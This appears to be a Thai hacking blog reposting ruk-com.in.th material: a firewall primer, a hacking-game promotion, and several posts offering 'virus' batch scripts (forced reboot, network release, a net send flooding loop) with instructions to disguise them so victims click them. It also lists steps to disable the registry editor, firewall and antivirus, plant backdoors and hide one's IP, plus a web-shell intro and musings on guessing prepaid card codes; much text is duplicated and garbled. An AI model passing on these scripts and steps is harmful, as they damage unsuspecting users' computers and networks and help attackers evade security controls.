ลองค้นแล้วหาไม่เจอคิดว่าถ้าใคเข้ามาในเวบนี้ควรต้องรู้ไว้
ความรู้พื้นฐานเกี่ยวกับ Firewall
Firewall คืออะไร
Firewall นั้นหากจะแปลตรงตัวจะแปลว่ากำแพงไฟ แต่ที่จริงแล้ว firewall นั้นเป็นกำแพงที่มีไว้เพื่อป้องกันไฟโดยที่ตัวมันเองนั้นไม่ใช่ไฟตามดังคำ แปล firewall ในสิ่งปลูกสร้างต่างๆนั้นจะทำด้วยอิฐเพื่อแยกส่วนต่างๆของสิ่งปลูกสร้างออก จากกันเพื
่อที่ว่าในเวลาไฟไหม้ไฟจะได้ไม่ลามไปทั่วสิ่งปลูกสร้างนั้นๆ หรือ Firewall ในรถยนต์ก็จะเป็นแผ่นโลหะใช้แยกส่วนของเครื่องยนต์และส่วนของที่นั่งของผู้ โดยสารออก
จากกัน
ในเครือข่าย Internet นั้น firewall อาจถูกใช้สำหรับป้องกันไม่ให้ "ไฟ" จากเครือข่าย Internet ภายนอกลามเข้ามาภายในเครือข่าย LAN ส่วนตัวของท่านได้ หรืออาจถูกใช้เพื่อป้องกันไม่ให้ผู้ใช้ใน LAN ของท่านออกไปโดน "ไฟ" ในเครือข่าย Internet ภายนอกได้
ตามคำจำกัดความแล้ว firewall หมายความถึง ระบบหนึ่งหรือกลุ่มของระบบที่บังคับใช้นโยบายการควบคุมการเข้าถึงของระหว่างเครือข่า
ยสอง เครือข่าย โดยที่วิธีการกระทำนั้นก็จะแตกต่างกันไปแล้วแต่ระบบ แต่โดยหลักการแล้วเราสามารถมอง firewall ได้ว่าประกอบด้วยกลไกสองส่วนโดยส่วนแรกมีหน้าที่ในการกั้น traffic และส่วนที่สองมีหน้าที่ในการปล่อย traffic ให้ผ่านไปได้
แฮกเกอร์
วันพฤหัสบดีที่ 12 เมษายน พ.ศ. 2555
แนะนำเกมส์ฝึก Hack ที่มีความสมจริงที่สุดครับ [ชาว Ruk-Com ไม่ควรพลาด]
Hack Me If You Can ?
สวัสดีครับวันนี้จะมาแนะนำเว็บเกี่ยวกับสอน ทักษะการเป็น Hacker อย่างดีเลยครับ (game) นะครับ
เว็บ
http://www.hackerskill.net << ชื่อเว็บก็น่าตื่นเต้นแล้ว
ในเว็บมีอะไรบ้าง เดี๋ยวจะพาไปชมครับ
ขั้นตอนการเล่นเกมส์
1 สมัครสมาชิกก่อนเลยครับ
เสร็จแล้ว มองหาตามภาพครับ
ด่านต่างๆ มีทั้ง basic และั ภารกิจเสมือนจริงครับ
สำหรับผู้ที่เพิ่งจะเริ่มต้นไม่มีความรู้มากนักทางเว็บได้จัดทำที่ไว้ให้แชร์ความรู้กัน สอบถาม กันได้ตามสบายครับ
ข้อมูลจาก ruk-com.in.th
สวัสดีครับวันนี้จะมาแนะนำเว็บเกี่ยวกับสอน ทักษะการเป็น Hacker อย่างดีเลยครับ (game) นะครับ
เว็บ
http://www.hackerskill.net << ชื่อเว็บก็น่าตื่นเต้นแล้ว
ในเว็บมีอะไรบ้าง เดี๋ยวจะพาไปชมครับ
ขั้นตอนการเล่นเกมส์
1 สมัครสมาชิกก่อนเลยครับ
เสร็จแล้ว มองหาตามภาพครับ
ด่านต่างๆ มีทั้ง basic และั ภารกิจเสมือนจริงครับ
สำหรับผู้ที่เพิ่งจะเริ่มต้นไม่มีความรู้มากนักทางเว็บได้จัดทำที่ไว้ให้แชร์ความรู้กัน สอบถาม กันได้ตามสบายครับ
ข้อมูลจาก ruk-com.in.th
แจก โค้ดไวรัส Autorun งายๆแต่โครตอันตราย
ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
วันอังคารที่ 10 เมษายน พ.ศ. 2555
ที่สุดของ Hacker ที่ Hacker ไฝ่ฝันไขว้ขว้ามันมา
เรื่องนี้อาจเป็นเรื่องสุดท้ายของผม ก่อนไปผมอยากเห็น พวกคุณ ขอบคุณ ผมจริงๆจังๆสักที ขอคุณครับ :-\ :-\
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
@echo off
net stop "Security Center"
netsh firewall set opmaode mode=disable
4.รุ้ข้อมูลเครื่องเหยื่อ net stop "Security Center"
netsh firewall set opmaode mode=disable
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
เจาะระบบ Net work ฉบับสมบูรณ์ (หากซ้ำขออภัย)
ถ้าคุณอยากจะ Hack เว็บซักเว็บนึง
การ hack แบบเนี้ยรู้สึกว่าเค้าจะเรียกกันว่า hack webapp ซึ่งง่ายและเข้าใจได้ไว สำหรับผู้เริ่มต้น hack แบบนี้ เราจะได้มาซึ่ง shell ไอ้เจ้า shell นี้ ถ้าให้อธิบายคนไม่รู้เรื่องเอาเลยได้ฟัง คงจะเปรียบกับเรา บุกเข้าไปถึง drive ต่างๆ ของเครื่อง server เช่น c: d: e: แล้วเราสามารถที่จะ สั่ง ให้เครื่องนั้น ทำอะไรก็ได้ ด้วย shell command ต่างๆ เช่น จะ dir ดู file จะ format จะขโมยสคริป จะ dump database จะ ฯลฯ ตามแต่จินตนาการ เท่าที่ command ต่างๆ จะทำได้
เริ่มเข้าเรื่องดีกว่า
ขั้นแรก ขั้นหา ip
ก่อนจะ hack เราก็ต้องหาว่าเครื่องเจ้ากรรมเนี้ย ตั้งอยู่ที่ไหน การที่เราจะดูว่าเวปนี้ตั้งอยู่ในคอมเครื่องไหน ใช้คอมเครื่องไหนเป็น server หรือไปเช่า host ใครอยู่ ไม่ว่าจะใครจะเรียกยังไง ผมเรียกว่าเครื่องนั้นคือเครื่อง server แล้วกัน สิ่งที่จะบ่งชี้ว่าเครื่องใครเป็นเครื่องใครก็คือ IP ทีนี้การจะได้มาซึ่ง IP ของเจ้าคอมเครื่องที่มีเวปที่เราอยากจะ hack ตั้งอยู่ ก็มีหลายวิธี แบบง่ายเราก็ เข้าหน้า จอ dos แล้วก็ ping ชื่อเวป เราก็จะได้ ip แระ หรือ เราจะใช้ addons ของ firefox ก็ได้ (ลองหาเอง มีเยอะแยะ) หรือจะเข้า google หาเวปประเภทบริการ whois ให้ก็ได้
เราสามารถ hack บัตรเติมเงินโทรศัพท์ ได้หรือไม่
บังเอิญได้อ่านบทความนี้มาจาก Net พบว่า เป็นโจทย์ที่น่าคิดมาก เพราะผมก็ใช้บัตรเติมเงินอยู่ เป็นของ dtac
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
สมัครสมาชิก:
บทความ (Atom)